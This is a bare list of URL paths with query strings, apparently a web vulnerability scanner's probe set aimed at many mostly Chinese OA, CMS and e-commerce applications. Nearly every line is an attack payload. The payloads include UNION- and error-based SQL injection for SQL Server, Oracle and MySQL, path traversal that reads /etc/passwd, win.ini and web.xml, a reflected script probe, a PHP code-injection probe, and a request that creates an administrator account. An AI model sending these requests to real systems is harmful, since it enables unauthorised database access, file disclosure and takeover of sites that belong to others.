/FormBuilder/yjzxList.aspx?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CHR(106)%7C%7CCHR(60)%7C%7CCHR(106)/**/FROM/**/DUAL--
/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1/**/UNION/**/ALL/**/SELECT/**/CHR(106)%7C%7CCHR(106)%7C%7CCHR(106),NULL,NULL,NULL/**/FROM/**/DUAL--
/goods/GoodsAdd.aspx?goodsid=1/**/AND/**/1122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&flag=2
/pub/search/search_video_view.asp?id=3&mid=4%20and%201122=CONVERT(INT,(SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29))&yh=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/main/findgbm2.asp?sql=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name&sqlbak=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name%20&px=
/ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
/nameedit.asp?table=bbs&id=1%20union%20all%20select%20null,null,null,null,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),null%20--&action=edit
/jis/front/sdgs/updateuser.jsp
/lm/down.jsp?pathfile=down.jsp
/website/dflz/dflzCjAction!caiwugk_list.action?orgCode=&orgName=&zuOrgCode=&zuOrgName=&cwgkbbh=-21'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--%20&cwgkbmc=
/Documents/FolderInfor.asp?POAID=0'%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/meetingroom/MeetingRoom_UseInfo.asp
/Documents/FolderInfor.asp?OAID=0%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL--
/downloadFile.action?path=index.jsp
/portal/getJsonData.action?userId=9090&ruleID=portal-common.getProFileInfo
/lm/front/noontimelist.jsp?flag=a&start=1&end=2&sysid=2'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL%20FROM%20DUAL%20--&groupid=4
/php/bill/print_addfeelog.php
/objectbox/selectx_userlist.jsp?fn_Keywords=1'%20UNION%20ALL%20SELECT%20NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL--%20&perm=&cPage=1&tiao=
/meetingroom/ShenQingInforDis.asp?OAID=-12%20AND%201993%20IN%20(char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100))%20---
/information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
/information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))---
/message/mytreedata.asp?bumenid=-12%20AND%201432=CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)))--%20&time=&time=
/house/upload/upload.asp
/sbweb/Upload_Save_2.asp
/feReport/chartList.jsp?delId=1&reportId=1%20and%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--
/jsearch/admin/opr_forcechangepwd.jsp
/home/front/search/opr_chatsearch.jsp?action=simplesearch&words=1%25%27%20union%20all%20select%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20DUAL%20--
/celive/live/index.php?action=1
/admin/Site/AddDomain.aspx?Edit=1&id=1000/**/%20/**/union/**/%20/**/all/**/%20/**//**/SELECT/**/%200,/**/CHAR(106)%2bCHAR(106)%2bCHAR(106),0,0,'',0,2014,0/**/FROM/**/%20ZL_Manager
/baseNews_view.jsp?newsId=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--
/Lesktop/command.aspx
/Lesktop/Management/DeptEdit.aspx?did=1%20and%20char(106)%3E0
/Lesktop/sendfile.aspx
/Office_Supplies/Goods_Main.aspx?type=1&info_id=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/Infomation.aspx?userid=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/VacationComputation.aspx?id=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/RCMANAGE_New/rcgl.aspx?UID=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/ObjSwitch/HYTZ.aspx?userid=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/modules/pdflist.aspx?info_id=1/**/union/**/all/**/select/**/null,null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),null,null,null/**/from/**/dual%20--
/jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1%20union%20all%20select%2012,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20from%20dual%20--
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,md5(1122),0x7e),NULL,NULL,NULL,NULL
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL%23
/jcms/jcms_files/jcms1/web2/site/module/comment/opr_readfile.jsp?filename=opr_readfile.jsp
/managerNManager.action
/lm/manage/opr_setappraisal.jsp?fn_billstatus=E&vc_setapprid=-2087%20UNION%20ALL%20SELECT%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL%20FROM%20DUAL--
/jcms/m_1_9/column/getgroupuser.jsp?jgid=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)%20--&spell=2&webid=3&userid=4
/lm/sys/opr_bulletin_show.jsp?vc_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/lm/front/mailpublist.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/jcms/workflow/design/opr_model_class.jsp?fn_billstatus=E&vc_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100),NULL,NULL,NULL%20--
/jcms/m_5_5/m_5_5_1/objectbox/selectx_search.jsp?spell=1%25%27%20union%20all%20select%20null%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%20from%20dual%20--
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL%20--
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,0x7765627363616E3A693A66696E64,0x7e)%23
/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/admini/question/question.aspx?ID=25'%20and%20char(106)%2bchar(106)%3E0%20--
/ModifyNewsAction.do?newsID=-12
/plugins/qmail/MailTo.aspx?mail=1%27and%02CHAR(106)%2bCHAR(39)%3E0%02and%02%271%27=%271
/manage/Template/DSManage.aspx
/index.php?id=product&c=project&cate=1&ext[id%3C0%20union%20select%20111,2,3,4,5,6,md5(1122),8,9%20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--]=1
/api.php?id=_arclist&c=api&f=phpok&param[pid]=41&param[notin]=41)%20Union%20Select%201,md5(1122),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20
/admin/admin_adminmodifypwd.aspx
/jcms/m_5_6/ajax_printcol.jsp?cataid=1)%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)%20--
/feform/createprinttemplete.jsp?formid=1'%20AND%204321=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/fenc/syncsubject.jsp?pk_corp=1'%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/indexsearch/filter.jsp?tableId=1%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/Modules/jycg/SFDB.aspx?sfpjnm=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116),NULL%20--&type=1
/print/search_print_proof.jsp?proof_no=just_sql_test'
/include/user/mulbumentree.asp
/include/user/usertree.asp
/include/zidian/dantree.asp?ZiDian='%20AND%204321%3DCONVERT%28INT%2C%28SELECT%20CHAR%28106%29%2bCHAR%28117%29%2bCHAR%28115%29%2bCHAR%28116%29%2bCHAR%2895%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%28115%29%2bCHAR%28116%29%29%29%20--
/public/oa_nodebanliren_frm.asp
/include/chaxundetail.asp
/include/user/bdtreemx.asp
/admin/Fileup.aspx?path=notice/upload
/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20UNION%20SELECT%201,2,3,md5%281122%29,5,6,7,8,9%23
/inc/guestbook.php?do=guestbook&t=ajax&mid=1&content=testtesta%E9%8C%A6%27,(select%20concat%280x7c,md5%281122%29,0x7c%29from%20job_admin%20limit%201%29,NOW%28%29,1,1,3,1,if%281=2,1,char%28@%60%27%60%29%29%29%23@%60%27%60
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/hlp/help.asp?HlpCode=1'%20and%201=char(106)%20--
/Code/Common/SysCommonAttach.aspx?Method=GetNewID&IDs=isTrans&tabRecordId=1%27%20AND%201%3DCHAR%28106%29%20--
/ModifyNewsAction.do?newsID=-12'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%20%23
/piw/Site/KeyWordExport.jsp?ids=-111)%20union%20select%20Username,md5%281122%29,222,4444,5555%20from%20zduser%23
/schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20--
/common/mod/ajax.ashx
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=-1'%20and%201=char(106)%20--
/dakai.aspx
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=3'%20and%201=char(106)%20--
/Permission/Application_Query_List.aspx?deptName=3'%20and%201=char(106)%20--
/main/model/childcatalog/zxzxinfo.jsp?MailId=13%20UNION%20ALL%20SELECT%20NULL,CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29,NULL,NULL,NULL,NULL,NULL,NULL%20--
/index_page/geren_list_page.aspx?server=1&refid=1'%20AND%201=CHAR(106)%2bCHAR(60)%20--
/website/level3.jsp?tablename=7&infoid=-1'%20UNION%20ALL%20SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29--
/varset/modifyTime.asp?varname=&id=495'%20union%20all%20select%201,2,3,0x66696E643A76756C,5,6,7,8,9%20from%20teachers%20--
/getpassword.php?do=login
/api/uc/uc.php?code=380dDbp0QmFDGmUR2ENTw7v%2B1YVER%2BKFyWB3YQN0OARXAr%2BIV4p1g3Ou5yA2CG6k%2BYdUOSb%2BwsiMwU4aqz2Gmtae60ut%2Fw
/servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt
/servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt
/index.php?m=register&c=ajax_reg
/api/uc.php?code=8e347f1oWfxZ5isPSs7QBbA78aaJwxZCvdIIfY2niRLsrqrg0dHBfrkRSaOtzGxkncaWtRGPVKjVbHwZJSlI1JFH9WBN5wj%2Fsqj2Xg
/witapprovemanage/apprvaddNew.jsp?flowid=%27%20and%201=2%20UNION%20SELECT%201,2,3,4,char(106)%2bchar(60),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29;--%20-
/nicknamelogin.jsp
/jsearch/viewsnap.jsp?snapname=/../../../../../../../../../../../../../etc/passwd
/lm/objectbox/selectx_groupuserlist.jsp?vc_parid=-42873%27+or+%271%27=%271
/index.php?m=register&c=ajax_reg
/inc/ajax.asp?action=videoscore&id=1%20and%201=2%20union%20select%20CHR(106),CHR(99),3%20from%20%7Bpre%7Dmanager
/ajaxfs.php?tooltip=5254'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20%23
/utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%25%3Cscript%3Eprompt(42873)%3C/script%3E&page=1&action=view_logfile
/?q=node&destination=node
/UtilServlet?name=-1'%20UNION%20ALL%20SELECT%20NULL,%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)--%20&operation=getUserInfo&time=12
/jcms/m_5_e/module/individuation/opr_individuation_unit.jsp?fn_billstatus=B&sub_row=just_test
/govdiropen/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=..././..././..././..././..././..././WEB-INF/ini/merpserver.ini&webid=1&type=1&downname=just_test.txt
/down.aspx?id=(select%20convert(int,(select%20char(106)))%20FROM%20syscolumns)
/api/CheckMemberLogin.ashx?type=mobileisexist
/comm/showpic.php?pic=aHR0cDovL3d3dy5zby5jb20vcm9ib3RzLnR4dA%3D%3D
/LoginCheck.aspx
/NodeProdCategory.aspx?action=GetChildNode&CategoryId=(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))
/index.php?c=api&m=data&auth=finecms&param=action%3Dcache%20name%3DSPACE-MODEL.1%27%5D%3Bprint%28md5%281122%29%29%3B%2f%2f
/Book/user_read.jsp?classId=1'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20and%20'at'='at
/show.jsp?id=5'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20AND%20'AT'='AT
/NTRdrS_RegistInfo.aspx?BookRecno=1'%20AND%209211=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'AT'='AT
/NTRdrBookRetrInfo.aspx?BookRecno='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20chr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(58)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%20from%20DUAL))%7C%7C'
/NTRdrBookRetrInfo.aspx?BookRecno=18273&NewBIBNO=111%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)&NEWBOOK=newbook
/NTBookRetrTopShowright.aspx?page=1&Index=6&LocLmt=&SrchTab=3&Acurate=3&Key='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%20from%20DUAL))%7C%7C'&AllName=A++
/zfcgFrame/xx_look.aspx?ID=-1%27%20UNION%20ALL%20SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29--%20
/AdminP
/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23
/public/download.asp?filename=../login2.asp/
/Isv.ashx?action=addadmin&adminuser=admin&adminpassword=111111&guid=1
/index.php?controller=block&action=goodsCommend&id=0)%20Union%20select%201,md5(1122)%23
/API/DownloadProducts.ashx
/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts%20Desc)%20AS%20RowNumber%20FROM%20vw_Hishop_BrowseProductList%20p%20WHERE%20SaleStatus%20=%201)%20T%20WHERE%201=1%20and%201=char(106)%20--
/ProductUnSales.aspx?keywords=uio%2527&tagIds=1_2))%20T%20WHERE%201=1%20and%201=(select%20char(106)%2bchar(106))%20--%20&pageIndex=1
/SubCategory.aspx?TagIds=1%20and%20char(106)%3E1
/MShop/Partial/SuppLogo
/ShoppingHandler.aspx
/bq/Data/BIData.zip
/jphoto/objectbox/selectx_search.jsp?spell=1%25%27%20UNION%20SELECT%20CHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2899%29%7C%7CCHR%2899%29%2Cnull%20FROM%20DUAL%20--
/vc/vc/columncount/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/jact/workflow/design/index.jsp?flowcode=a'%20UNION%20ALL%20SELECT%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(107)%7C%7CCHR(109)%7C%7CCHR(108),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/jis/manage/role/opr_approleinfo_user2.jsp?c_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(101)%2bCHAR(102)%2bCHAR(58)%2bCHAR(104)%2bCHAR(103)%2bCHAR(58)%2bCHAR(105),NULL,NULL--%20
/cms/voteManager/voteaction.jsp
/EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107))
/ShopManage.aspx
/RegionHandle.aspx?action=GetChildNode&ParentId=(select%20%20(char(106)%2bchar(100)))
/SNS/Product/WaterfallProductListData
/ProSales/GetListCate
/jphoto/jphoto/sys/member/opr_export.jsp
/JwGl/jxjh/JxjhXGBc.asp
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html
/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../index.jsp
/defaultroot/public/select_user/search_org_list.jsp?searchName=a%27%20UNION%20ALL%20SELECT%20CONCAT%280x23%2C0x7765627363616E3A693A66696E64%2C0x23%29%2CNULL%23
/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(108)%2bCHAR(109)%2bCHAR(110),NULL,NULL,NULL,NULL,NULL,NULL--
